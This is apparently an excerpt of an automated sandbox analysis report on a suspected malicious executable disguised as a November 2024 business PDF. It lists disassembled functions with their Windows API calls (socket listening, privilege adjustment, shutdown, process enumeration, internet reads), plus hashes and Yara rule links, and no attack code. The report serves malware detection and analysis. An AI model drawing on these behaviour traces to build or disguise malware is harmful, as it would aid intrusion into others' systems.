                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: e0b1b7f427ffe5912b7b0c69015542bf59e3b3f81acc67fae86f4e6eff447806
                                                                                                                      • Instruction ID: df4e14fdc6165f643afb969a555d05934ab19062105f9e9f75421fdec3502098
                                                                                                                      • Opcode Fuzzy Hash: e0b1b7f427ffe5912b7b0c69015542bf59e3b3f81acc67fae86f4e6eff447806
                                                                                                                      • Instruction Fuzzy Hash: 26127970A00609DFDF14DFA4D985AEEB7B5FF48300F108669E806E7251EB39AD25DB90
                                                                                                                      Function 00765680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                                                                                                                        • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                                                                                                                      • _memmove.LIBCMT ref: 007A062F
                                                                                                                      • _memmove.LIBCMT ref: 007A0744
                                                                                                                      • _memmove.LIBCMT ref: 007A07EB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                      • String ID: yZv
                                                                                                                      • API String ID: 1300846289-1565780762
                                                                                                                      • Opcode ID: e4994f5e24690d934151f46046f60675ab8021ddbfb22d6fc68ec965a1c6ea78
                                                                                                                      • Instruction ID: 50f021594ebd9977403c1c43426a720cdca0727113be739d7ec79616d74666f8
                                                                                                                      • Opcode Fuzzy Hash: e4994f5e24690d934151f46046f60675ab8021ddbfb22d6fc68ec965a1c6ea78
                                                                                                                      • Instruction Fuzzy Hash: F402BFB0E00209DFDF04DF64D985AAE7BB5FF84340F148469E80ADB255EB39DA64CB91
                                                                                                                      Function 007B545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                                                                                                                        • Part of subcall function 007A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                                                                                                                        • Part of subcall function 007A8CC3: GetLastError.KERNEL32 ref: 007A8D47
                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 007B549B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                      • Opcode ID: 1d3089f37d52cc56ba0a56c499991fc5bc2abd7b7ddb56ace7c87eb1e016d63f
                                                                                                                      • Instruction ID: 8a3f8e87136803f1d8bf37fe205476280293b7f34bb68a97f18c738504cd8b5b
                                                                                                                      • Opcode Fuzzy Hash: 1d3089f37d52cc56ba0a56c499991fc5bc2abd7b7ddb56ace7c87eb1e016d63f
                                                                                                                      • Instruction Fuzzy Hash: 4B01F231655B556AE7A86678EC4ABFA7368EB05352F244521FD07D20D2DABC1C8081A4
                                                                                                                      Function 00763190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __itow__swprintf
                                                                                                                      • String ID: Oav
                                                                                                                      • API String ID: 674341424-1091017984
                                                                                                                      • Opcode ID: 2958ad609cea23eb6a58ac253b33684ac7b01b9a03202d45386efe12324745d7
                                                                                                                      • Instruction ID: 57a7fa2da17895025f2d513c3776cae149944a018325cdfad9129dd3725b183c
                                                                                                                      • Opcode Fuzzy Hash: 2958ad609cea23eb6a58ac253b33684ac7b01b9a03202d45386efe12324745d7
                                                                                                                      • Instruction Fuzzy Hash: 49229B71518341DFCB24DF24C895BABB7E4BF84300F14891DF99A97292DB79EA04CB92
                                                                                                                      Function 007C6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007C65EF
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C65FE
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 007C661A
                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 007C6629
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C6643
                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 007C6657
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279440585-0
                                                                                                                      • Opcode ID: 2b04588a6a7bd3014bf12212ee431957e3aeebf6f0d982baaea6034bd72af8bf
                                                                                                                      • Instruction ID: 6d6a61f396ebcd0c547127826dce0cc9c34c753f5c5190042225c8b32ad0bb97
                                                                                                                      • Opcode Fuzzy Hash: 2b04588a6a7bd3014bf12212ee431957e3aeebf6f0d982baaea6034bd72af8bf
                                                                                                                      • Instruction Fuzzy Hash: 18218B30200204DFCB10EF24C889FAEB7F9EF49320F14816EE956A7291CB78AD05DB65
                                                                                                                      Function 00751287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 007519FA
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00751A4E
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00751A61
                                                                                                                        • Part of subcall function 00751290: DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorProc$LongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3744519093-0
                                                                                                                      • Opcode ID: 19ae066b0960474be101156ad8b135b68d63efe0b0dce815b0732e97c74344b0
                                                                                                                      • Instruction ID: acb3d0601a60a2b74a54d3bb3ce294ddfd2ef1325fb99ce9d30a714e699cb773
                                                                                                                      • Opcode Fuzzy Hash: 19ae066b0960474be101156ad8b135b68d63efe0b0dce815b0732e97c74344b0
                                                                                                                      • Instruction Fuzzy Hash: 1BA13AB5105585FAD63AAB384C48FFF266DEF42343B94811AFC02D5191DB9C9D09D3B1
                                                                                                                      Function 007C6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007C6AB1
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C6ADA
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 007C6B13
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C6B20
                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 007C6B34
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 99427753-0
                                                                                                                      • Opcode ID: b786e41a9fc26017a289cbc9acf8c3f1c192e1790ad33ac598cce524f5bd7cba
                                                                                                                      • Instruction ID: 98fcaa2746c974047a60a28ae06902964790f909d2bbae0dfce9636876ad8b5b
                                                                                                                      • Opcode Fuzzy Hash: b786e41a9fc26017a289cbc9acf8c3f1c192e1790ad33ac598cce524f5bd7cba
                                                                                                                      • Instruction Fuzzy Hash: 0141A575600214EFEB10AF24DC8AFAE77A99B44710F44C05DFE16AB2D2DBB89D048791
                                                                                                                      Function 007D55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 292994002-0
                                                                                                                      • Opcode ID: 223dd148b85ec6481f7de753d28ec9baca01fb8dbad0c83f7fefc7eca6b0ec46
                                                                                                                      • Instruction ID: e2bc76f86731d1cf3b2bc67a20640f746a09cf094048fc326f3ad197f3d52f68
                                                                                                                      • Opcode Fuzzy Hash: 223dd148b85ec6481f7de753d28ec9baca01fb8dbad0c83f7fefc7eca6b0ec46
                                                                                                                      • Instruction Fuzzy Hash: 6411C431301910AFE7211F26DC48A6F7BB8EF84B21B84802AF847D7341CB7CD901CAA9
                                                                                                                      Function 007BC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 007BC69D
                                                                                                                      • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BC6B5
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                      • CoUninitialize.OLE32 ref: 007BC922
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                      • Opcode ID: 8eec1f558bfbd44ce9b7fa0db60937ee284fcf8581d0b91aa36c60c2ff4b5562
                                                                                                                      • Instruction ID: 473ea80f754532bdc0f0506d7a9733732768e2b5843d4479dce6ed7567770c02
                                                                                                                      • Opcode Fuzzy Hash: 8eec1f558bfbd44ce9b7fa0db60937ee284fcf8581d0b91aa36c60c2ff4b5562
                                                                                                                      • Instruction Fuzzy Hash: 40A15D71504205EFD700EF64C895EABB7ECEF84305F04891CF556971A2DBB5EA09CB62
                                                                                                                      Function 007CC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00791D88,?), ref: 007CC312
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007CC324
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                      • Opcode ID: 6d55d36cf94b693c40e6710bfdef06eeb85b1f673871512dfc830c66761cb149
                                                                                                                      • Instruction ID: 2e9d1c64d641eee1052c180f42ffaa371c90818b8e76388734a484ebfadae886
                                                                                                                      • Opcode Fuzzy Hash: 6d55d36cf94b693c40e6710bfdef06eeb85b1f673871512dfc830c66761cb149
                                                                                                                      • Instruction Fuzzy Hash: 09E0ECB4601713CFDB225B35E804F4677E4EB08755B84C47EE89AD2250E77CD881CB61
                                                                                                                      Function 007CF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 007CF151
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 007CF15F
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 007CF21F
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007CF22E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2576544623-0
                                                                                                                      • Opcode ID: 99d21e8bcf641913aac1fb4092ab7cd4feeebd66031074687fedca2a7f1cb966
                                                                                                                      • Instruction ID: a1fa167148d989da15905c6f2b473a3514b69079077bf3d1728d38498595b431
                                                                                                                      • Opcode Fuzzy Hash: 99d21e8bcf641913aac1fb4092ab7cd4feeebd66031074687fedca2a7f1cb966
                                                                                                                      • Instruction Fuzzy Hash: 34513C71504311DFD310EF24DC89EABBBE8FF94710F14492DF99696291EB749908CB92
                                                                                                                      Function 007AEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007AEB19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: ($|
                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                      • Opcode ID: 543bb90626b4edd348ba2b12403d65cd41e1d218a7a5a4d93577397e879e3f5a
                                                                                                                      • Instruction ID: 7341c480fe1ddf019cc1fb4258e0cd81f2709f9a2dbc16ac4d4081ff033745c4
                                                                                                                      • Opcode Fuzzy Hash: 543bb90626b4edd348ba2b12403d65cd41e1d218a7a5a4d93577397e879e3f5a
                                                                                                                      • Instruction Fuzzy Hash: 58323675A00605DFDB28CF59C485A6AB7F1FF88320B11C56EE89ACB3A1E774E941CB50
                                                                                                                      Function 007C25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007C1AFE,00000000), ref: 007C26D5
                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007C270C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 599397726-0
                                                                                                                      • Opcode ID: 943f2455e4ed0ba69d7cfaa02959cc2e1ab2fe843fca21f760c722f3b83b4a17
                                                                                                                      • Instruction ID: 88a10474747bef47294e1f4a1bac8b979df6790a75568064533e679a7309e319
                                                                                                                      • Opcode Fuzzy Hash: 943f2455e4ed0ba69d7cfaa02959cc2e1ab2fe843fca21f760c722f3b83b4a17
                                                                                                                      • Instruction Fuzzy Hash: EC41C471600209FFEB20DA94DCC5FBBB7BCEB40764F10806EF605A6542EA799E429764
                                                                                                                      Function 007BB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 007BB5AE
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BB608
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BB655
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1682464887-0
                                                                                                                      • Opcode ID: d8bb8f95bb03697098da74cf05f40e89bec498ca26601cc41b134fa57d0448f0
                                                                                                                      • Instruction ID: 60243b7accaf0c5e9306780db069e15e9d256d98f5dbaf121a092f5ec1660ed9
                                                                                                                      • Opcode Fuzzy Hash: d8bb8f95bb03697098da74cf05f40e89bec498ca26601cc41b134fa57d0448f0
                                                                                                                      • Instruction Fuzzy Hash: 34217135A00118EFCB00EF65D884EEDBBB8FF48315F1480AAE906EB351DB35A915CB55
                                                                                                                      Function 007A8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                                                                                                                        • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                                                                                                                      • GetLastError.KERNEL32 ref: 007A8D47
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
